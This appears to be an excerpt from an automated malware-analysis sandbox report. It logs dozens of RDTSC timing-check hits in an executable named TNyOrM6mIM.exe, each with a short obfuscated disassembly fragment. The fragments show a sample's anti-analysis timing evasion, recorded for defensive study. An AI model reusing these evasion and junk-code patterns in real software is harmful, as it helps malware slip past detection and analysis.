                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117D418 second address: 117D41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117DAEC second address: 117DB21 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD6F84FEE7Bh 0x00000008 jmp 00007FD6F84FEE75h 0x0000000d pushad 0x0000000e js 00007FD6F84FEE66h 0x00000014 jmp 00007FD6F84FEE6Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1182998 second address: 11829A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD6F84FD816h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11829A3 second address: 11829C5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD6F84FEE68h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 jmp 00007FD6F84FEE6Eh 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11829C5 second address: 11829EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jg 00007FD6F84FD818h 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11829EA second address: 1182A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FEE73h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1182A02 second address: 1182A0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD6F84FD816h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1182C6B second address: 1182C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD6F84FEE66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11488B3 second address: 11488B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 118ACE6 second address: 118ACFC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD6F84FEE6Dh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 118F0AC second address: 118F123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FD6F84FD818h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 add esi, dword ptr [ebp+122D3471h] 0x00000028 jmp 00007FD6F84FD823h 0x0000002d call 00007FD6F84FD819h 0x00000032 jmp 00007FD6F84FD825h 0x00000037 push eax 0x00000038 jbe 00007FD6F84FD81Ah 0x0000003e push edi 0x0000003f push edi 0x00000040 pop edi 0x00000041 pop edi 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 push esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 118FC00 second address: 118FC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 118FC04 second address: 118FC0E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 118FCFA second address: 118FD10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FEE72h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 118FF72 second address: 118FF76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119009B second address: 11900A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD6F84FEE66h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11900A6 second address: 11900AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11900AC second address: 11900B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119010D second address: 119014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FD6F84FD818h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add si, 146Dh 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jl 00007FD6F84FD81Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119014B second address: 119014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11905CC second address: 11905D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD6F84FD816h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1190EC6 second address: 1190ECD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1190DB8 second address: 1190DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1190ECD second address: 1190EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FD6F84FEE66h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1190EDF second address: 1190EF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FD820h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1190EF3 second address: 1190F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FEE6Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119347D second address: 1193481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119405D second address: 11940D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FD6F84FEE68h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jmp 00007FD6F84FEE6Dh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FD6F84FEE68h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D1A19h] 0x0000004b mov dword ptr [ebp+122D2921h], ebx 0x00000051 push 00000000h 0x00000053 mov dword ptr [ebp+122D2654h], eax 0x00000059 push eax 0x0000005a pushad 0x0000005b je 00007FD6F84FEE68h 0x00000061 pushad 0x00000062 popad 0x00000063 push eax 0x00000064 push edx 0x00000065 jp 00007FD6F84FEE66h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1194BC3 second address: 1194C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+1244D3A6h], edx 0x0000000f push 00000000h 0x00000011 movsx edi, cx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FD6F84FD818h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push ebx 0x00000031 and esi, 482C411Dh 0x00000037 pop edi 0x00000038 push eax 0x00000039 push eax 0x0000003a pushad 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 114538C second address: 114539D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD6F84FEE66h 0x0000000a ja 00007FD6F84FEE66h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 114539D second address: 11453A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD6F84FD816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11453A9 second address: 11453AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119A911 second address: 119A917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119A917 second address: 119A91B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119BEB4 second address: 119BF2E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD6F84FD81Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FD6F84FD818h 0x00000012 pop edx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FD6F84FD818h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2E65h] 0x00000034 call 00007FD6F84FD828h 0x00000039 mov ebx, dword ptr [ebp+12444F61h] 0x0000003f pop ebx 0x00000040 push 00000000h 0x00000042 mov dword ptr [ebp+1244770Ch], ebx 0x00000048 push 00000000h 0x0000004a mov edi, dword ptr [ebp+124563B4h] 0x00000050 push eax 0x00000051 push edi 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 114D929 second address: 114D92E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119F7C4 second address: 119F7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A082D second address: 11A083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD6F84FEE6Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A1761 second address: 11A176B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A176B second address: 11A1777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A1777 second address: 11A177C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A0906 second address: 11A0916 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A0916 second address: 11A091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A48EC second address: 11A490C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD6F84FEE73h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A3A30 second address: 11A3A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A5810 second address: 11A582B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD6F84FEE6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FD6F84FEE79h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A69B4 second address: 11A69B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A69B8 second address: 11A69D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FEE78h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A69D4 second address: 11A6A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D17BFh], edx 0x00000011 push 00000000h 0x00000013 mov di, si 0x00000016 push 00000000h 0x00000018 movsx ebx, bx 0x0000001b mov ebx, dword ptr [ebp+122D36A4h] 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 jc 00007FD6F84FD818h 0x00000029 push edi 0x0000002a pop edi 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A7932 second address: 11A793C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD6F84FEE6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A897A second address: 11A898F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD6F84FD818h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11A8AAF second address: 11A8AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11AA822 second address: 11AA826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11AA826 second address: 11AA84E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD6F84FEE77h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11AAA51 second address: 11AAA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11AF603 second address: 11AF60D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD6F84FEE6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3B89 second address: 11B3B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3B8F second address: 11B3B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3B95 second address: 11B3B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3B99 second address: 11B3BAD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD6F84FEE66h 0x00000008 ja 00007FD6F84FEE66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3BAD second address: 11B3BBE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FD6F84FD816h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3BBE second address: 11B3BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3BC2 second address: 11B3BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD6F84FD816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007FD6F84FD827h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3443 second address: 11B3447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3447 second address: 11B3463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FD826h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3768 second address: 11B3781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FD6F84FEE70h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3781 second address: 11B3787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11B3787 second address: 11B378B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C330F second address: 11C3368 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD6F84FD82Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD6F84FD821h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jnl 00007FD6F84FD82Dh 0x0000001a mov eax, dword ptr [eax] 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C3368 second address: 11C3378 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C3378 second address: 11C337D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C34D4 second address: 11C34D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C34D8 second address: 11C34E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FD6F84FD816h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11436FA second address: 1143700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1143700 second address: 114372D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD6F84FD829h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 114372D second address: 1143731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1143731 second address: 1143735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1143735 second address: 114373B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C7B3A second address: 11C7B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C7B42 second address: 11C7B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C7B46 second address: 11C7B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C7B51 second address: 11C7B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD6F84FEE66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C7B5D second address: 11C7B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
